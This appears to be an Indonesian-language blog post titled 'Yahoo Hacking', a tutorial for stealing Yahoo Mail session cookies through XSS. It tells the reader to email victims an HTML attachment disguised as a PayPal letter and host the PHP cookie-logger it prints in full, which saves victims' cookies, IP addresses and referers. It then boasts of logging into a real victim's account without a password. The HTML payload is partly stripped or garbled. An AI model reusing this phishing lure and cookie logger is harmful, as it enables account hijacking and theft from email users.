Yahoo Hacking

Seperti yang telah kita ketahui .. XSS merupakan salah sebuah jenis serangan yang paling berbahaya dalam dunia berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang terkena jenis serangan sejenis ini .. Tidak percaya?! Mari kita buktikan :D

Pertama tama anda membutuhkan script ini:



x" frameborder="0">
User required to use Internet Explorer to view this file.
html>

Yang kemudian perlu anda masukan kedalam file *.html
dan kemudian perlu anda attach dalam sebuah email ..

Selain itu andapun memerlukan file *.php yang berisikan script ini:
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '
idu lu ala: ' .$cookie. 'Cookie: '.$cook.'
IP: ' .$ip. '
Referer: '.$referer.'


');
fclose($fp);
?>

Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accept PHP.. Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..

Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak .. Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban .. Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain. Dalam kasus ini saya menggunakan Paypal Letters.
Sekarang ketika mereka membuka email mereka dengan menggunakan Internet Explorer .. Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..

Berikut contohnya :

Yay !!!
Paypal letters!!!
But.. Is that all ??

OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! :D

Sekarang bagaimana kita memanfaatkan cookie tersebut?!
Mudah saja .. Yang anda perlukan adalah Y dan T ..

Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD

woops!!
My bad ..
My victim changed his Pass already

Coba kita gunakan pass pribadi

Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!

Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1
Yay!!!
Hhahaha